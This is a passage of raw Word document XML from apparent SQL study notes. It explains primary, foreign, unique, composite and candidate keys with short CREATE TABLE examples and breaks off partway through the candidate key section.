          </w:tcPr>
          <w:p w14:paraId="4F263094"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Only </w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>one</w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> primary key per table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07226EB1"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Can have </w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>multiple</w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> unique keys per table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="46EB69A2" w14:textId="77777777" w:rsidTr="00F45251">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="631BAB95"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37926180"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Uniquely identifies a row in a table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05B33456"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Prevents duplicate values in a column</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="50B3B6C9" w14:textId="77777777" w:rsidTr="00F45251">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50405400"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efault Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EE37045"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Automatically creates a </w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>clustered index</w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (in some DBs like SQL Server)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0656F2F8"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Creates a </w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>non-clustered index</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="76E9883C" w14:textId="77777777" w:rsidTr="00F45251">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19781AAF"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Constraint Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FA46100"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Primary Key Constraint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="502A0408"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Unique Constraint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="781C641F" w14:textId="77777777" w:rsidR="00F45251" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00F4525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259AF70">
          <v:rect id="_x0000_i2930" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="743A030D" w14:textId="77777777" w:rsidR="00F45251" w:rsidRPr="00393B05" w:rsidRDefault="00F45251" w:rsidP="00F45251">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70940B6C"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CREATE TABLE Employee (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A871841"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  emp_id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBA76B7"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  email VARCHAR(255) UNIQUE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B69231F"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  phone VARCHAR(20) UNIQUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B753187"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F9FD01"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emp_id → Primary Key (no duplicates, no nulls)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666BFE08"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email, phone → Unique Keys (no duplicates, but can be null once)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FD5D9C" w14:textId="77777777" w:rsidR="00F45251" w:rsidRPr="00393B05" w:rsidRDefault="00F45251" w:rsidP="00F45251">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Let me know if you want examples with insert queries too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2487BA1C" w14:textId="203A52A7" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066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5FB9972">
          <v:rect id="_x0000_i2931" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD69628" w14:textId="518E41AF" w:rsidR="00DC5E8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC5E8B" w:rsidP="00DC5E8B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="698" w:name="_Toc196308178"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain different Keys in SQL?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="698"/>
    </w:p>
    <w:p w14:paraId="6E7CB97A" w14:textId="25369B8F" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00E74E18" w:rsidP="00E763C5">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ere is a detailed explanation of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all types of keys in SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with purpose, characteristics, and examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E47043" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E74E1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8562796">
          <v:rect id="_x0000_i2932" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B38664"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1. Primary Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4937922E"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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EFBF42"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primary key uniquely identifies each record in a table. It must contain </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> values and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot be NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F892AEE"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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C40D249"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nly </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one primary key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> per table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD034F4"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an consist of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single or multiple columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (composite key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778C46D5"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utomatically creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique index</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B86638C"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA5C99A"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REATE TABLE Employee (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C33E751"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mp_id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3E0E7B"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name VARCHAR(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBE487E"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7EFF260" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E74E1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C3964F5">
          <v:rect id="_x0000_i2933" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B32163A"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2. Foreign Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8BA89A"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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D00DC3"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foreign key enforces a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>relationship</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between two tables. It references the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>primary key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of another table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ACC862"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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56902992"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Ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>referential integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7397BB4D"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llows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>duplicate values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NULLs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, unless specified otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF95D14"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an be used to create </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>many-to-one or one-to-one</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F749584"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1698CD36"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REATE TABLE Department (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F054570"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ept_id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0845DC11"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 xml:space="preserve">    dept_name VARCHAR(50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B182DBF"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99FF3B7" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00E74E18" w:rsidP="00E74E18">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3855B316"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REATE TABLE Employee (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC41348"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mp_id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F248526"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mp_name VARCHAR(100),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1714F466"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dept_id INT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0AE9F"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FOREIGN KEY (dept_id) REFERENCES Department(dept_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4167BAC4"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374C31A" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E74E1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0E2DF14">
          <v:rect id="_x0000_i2934" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D8460"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3. Unique Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C3F1A"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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D9565"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Enforces the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uniqueness</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the values in one or more columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A9326F"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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5600B7FF"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llows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (only one NULL in most databases).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749F8C26"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table can have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple unique keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D077D4"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t necessarily a primary identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0391DAC2"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D81F6AF"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REATE TABLE User (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE13F83"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user_id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554E574F"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mail VARCHAR(100) UNIQUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39785FEB"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5A049BA0" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E74E1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A94AE1A">
          <v:rect id="_x0000_i2935" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD3407B"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4. Composite Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5DBC73"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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231354BB"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combination of two or more columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to uniquely identify a record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A65251"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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B0B2BD"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l columns together form the key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC5B0CF"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d when no single column is unique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1CDF39"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC7F5F"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REATE TABLE Orders (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489F4E7B"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order_id INT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22929EE6"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oduct_id INT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE6ABB4"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quantity INT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4556038A"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PRIMARY KEY (order_id, product_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD29562"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CB998AF" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E74E1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4E7D8E3">
          <v:rect id="_x0000_i2936" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17234160"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5. Candidate Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8FC482"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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7297C1"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set of columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
